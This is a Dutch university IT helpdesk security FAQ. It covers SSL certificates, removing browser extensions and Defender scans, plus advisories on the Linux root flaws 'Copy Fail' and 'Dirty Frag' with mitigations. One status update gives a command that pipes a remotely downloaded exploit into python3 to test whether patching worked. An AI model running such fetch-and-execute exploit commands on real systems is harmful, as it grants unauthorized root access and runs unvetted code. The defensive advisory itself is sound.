Veelgestelde vragen over beveiliging
Om je webserver te beveiligen met https moet je ervoor zorgen dat je correct werkende SSL certificaten hebt.
UGent medewerkers kunnen zelf een certificaat maken en laten ondertekenen. Een alternatief is het gebruiken van LetsEncrypt om certificaten aan te vragen en automatisch te vernieuwen.
Tegenwoordig hebben recente versies van webservers zoals Apache ingebouwde ondersteuning hiervoor. Het is dus niet nodig om b.v. certbot te gebruiken voor het verwerken van LetsEncrypt certificaten. Zie bijvoorbeeld deze tutorial. Op Windows kan je dit ook gebruiken.
Volg onderstaande instructies om schadelijke of onbekende browser extensies te verwijderen.
Google Chrome
- Open Chrome
- Klik op de drie puntjes (⋮) in de rechterbovenhoek
- Selecteer Extensies > Extensies beheren
- Zoek de extensie in de lijst en klik vervolgens op Verwijderen
Microsoft Edge
- Open Edge
- Klik op de drie puntjes (…) in de rechterbovenhoek
- Selecteer Extensies > Extensies beheren
- Zoek de extensie in de lijst en klik vervolgens op Verwijderen
Mozilla Firefox
- Open Firefox
- Klik op de menuknop (☰) in de rechterbovenhoek
- Selecteer Extensies en thema's en vervolgens Extensies
- Zoek de extensie in de lijst en klik op de drie puntjes (…) ernaast
- Klik in het menu op Verwijderen
Safari (macOS)
- Open Safari
- Kies in het Safari-menu in de menubalk de optie Instellingen (of Voorkeuren)
- Klik op Extensies
- Selecteer de extensie in de lijst en klik op de knop Verwijder installatie
Stel een nieuwe vraag op ICT HelpMe. Je kan ook bellen naar:
- 09 264 47 47 tijdens de werkuren (ICT Helpdesk) van 8u tot 18u
- 09 264 88 88 buiten de werkuren (PermanentieCentrum)
Lexicon
- Browser caching is een tijdelijke opslag op je computer waarin onderdelen van websites worden bewaard om ze sneller te laden bij een volgend bezoek.
- Cookies zijn kleine tekstbestandjes die websites op je computer of telefoon plaatsen om informatie over je bezoek op te slaan. Ze helpen websites jou te herkennen en je ervaring te personaliseren.
Hoe verwijderen?
De manier om je cache, cookies en geschiedenis te verwijderen is afhankelijk van de browser die je gebruikt:
- Typ in de zoekbalk onderaan "virus en bedreigingsbeveiliging".
- Open Virus en bedreigingsbeveiliging.
- Doe even eerst een "Snelle scan".
- Klik daarna op "Scanopties".
- Selecteer "Volledige scan" en daarna "Nu scannen".
Dit gaat langere tijd lopen maar je kan gerust verderwerken (mogelijks werkt de laptop wel iets trager door de scan in de achtergrond).
Status 3 8/05/2026 15u45
Vorige week informeerden we jullie over de kritieke Linux-kwetsbaarheid “Copy Fail” (CVE-2026-31431). We willen eraan herinneren dat systemen die nog niet gepatcht of gemitigeerd zijn, dringend aangepakt moeten worden. Het risico blijft hoog zolang systemen kwetsbaar blijven. Zie https://copy.fail
Nieuwe kwetsbaarheid "Dirty Frag"
Intussen is opnieuw een ernstige kwetsbaarheid gepubliceerd in de Linux-kernel gekend onder de naam "Dirty Frag". Ook deze kwetsbaarheid laat toe om root-rechten te verkrijgen op kwetsbare systemen. Op dit moment zijn nog niet voor alle distributies patches beschikbaar. Zie GitHub - V4bel/dirtyfrag
Deze opeenvolgende incidenten tonen aan dat de ontwikkelingen op AI-vlak het vandaag mogelijk maken om veel sneller en eenvoudiger nieuwe kwetsbaarheden te ontdekken én werkende exploits te ontwikkelen. Kwetsbaarheden die vroeger weken of maanden nodig hadden om in de praktijk misbruikt te worden, kunnen nu op zeer korte tijd operationeel uitgebuit worden. Een snelle en gestructureerde aanpak van patching en mitigatie wordt daardoor steeds belangrijker.
Wij vragen daarom bijzondere aandacht voor volgende punten:
- Zorg ervoor dat alle systemen onder jouw beheer zo snel mogelijk gepatcht worden zodra updates beschikbaar zijn.
- Voor systemen waar patchen niet onmiddellijk mogelijk is, moeten tijdelijke mitigaties voorzien worden.
- Houd ook expliciet bij welke systemen niet gepatcht of gemitigeerd kunnen worden. Deze systemen moeten gemeld worden aan functiedomein ICT via ICT HelpMe, zodat een risico-inschatting gemaakt kan worden en verdere acties bepaald kunnen worden.
- Zet maximaal in op automatisatie:
- activeer automatische OS-updates waar mogelijk
- gebruik centrale beheerstools zodat patches en mitigaties snel en gelijktijdig op grote aantallen systemen toegepast kunnen worden
- beperk manuele tussenkomsten zoveel mogelijk om reactietijden te verkorten
Voor “Dirty Frag” zijn momenteel mitigaties beschikbaar in afwachting van patches. Meer informatie hierover vindt u via de technische documentatie van de security onderzoekers. Volg daarnaast ook de communicatiekanalen van uw Linux-distributie voor updates en beveiligingspatches.
Systemen die vandaag niet tijdig gepatcht of gemitigeerd worden, lopen ook een verhoogd risico om later via andere, mogelijk minder kritieke, kwetsbaarheden volledig overgenomen te worden.
Status 2 30/04/2026 20u45
We kregen de vraag hoe men zeker kan zijn of de patch of de mitigation acties geslaagd zijn. De documentatie op https://copy.fail/ beschrijft hoe je de exploit kan uitvoeren. Indien je hierbij een fout krijgt, dan werkt de exploit niet en is je mitigation of patching gelukt. Voorbeeld:
user@laptop:~$ curl https://copy.fail/exp | python3 && su
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
Status 1 30/04/2026 14u30
Er is een kritieke kwetsbaarheid vastgesteld in de Linux kernel, aangeduid met CVE-2026-31431 en gekend met de naam “copy fail”. Hiermee kunnen “root”-rechten verkregen worden op het systeem door het uitvoeren van een kort Python-script dat een kwetsbaarheid in de Linux Crypto API (AF_ALG) misbruikt.
- Bijna alle Linux-kernels sinds 2017 zijn kwetsbaar.
- Bevestigd kwetsbaar: Ubuntu, RHEL, Amazon Linux, SUSE, Debian en afgeleiden. Systemen waarbij meerdere gebruikers inloggen, CI/CD, containers, gedeelde hosts (denk aan Linux PCs voor studenten of voor rekentaken) en webservers met andere (nog niet gekende) kwetsbaarheden hebben een veel hoger risico.
Op dit moment zijn er voor de meeste distro’s nog geen patches beschikbaar. We verwachten deze in de loop van de komende dagen. Hou hiervoor de kanalen voor jouw distro in de gaten en patch zodra deze beschikbaar is.
Voor systemen die nog kernel-updates uitbrengen en die je kan upgraden, patch deze zo snel mogelijk. Voor systemen die “end of life” zijn is het nodig de mitigatie zoals hieronder vermeld toe te passen. Systemen met een hoger risico passen best ook de mitigatie toe zolang de kernel niet gepatcht is.
Het gevaar bestaat dat een systeem dat nu niet gepatcht wordt in de toekomst via een minder kritieke kwetsbaarheid direct overgenomen kan worden. Vandaar dat ieder Linux-systeem zo snel mogelijk gepatcht moet worden.
Mitigatie
- Schakel indien mogelijk de algif_aead kernel-module uit. Zie https://copy.fail/#mitigation. De mitigatie kan systeemimpact hebben.
- Voor systemen waar de module ingebouwd is in de kernel (o.a. RedHat) kan je de boot parameter initcall_blacklist=algif_aead_init toevoegen en rebooten.
- Systemen die niet gepatcht kunnen worden en waarvoor geen mitigatie kan voorzien worden, dien je zo snel mogelijk te melden aan de helpdesk zodat een risico-inschatting gemaakt kan worden en verdere acties bepaald kunnen worden.
Medewerkers en studenten vinden algemene informatie over IT-security op Beveiliging (ICT Helpdesk website).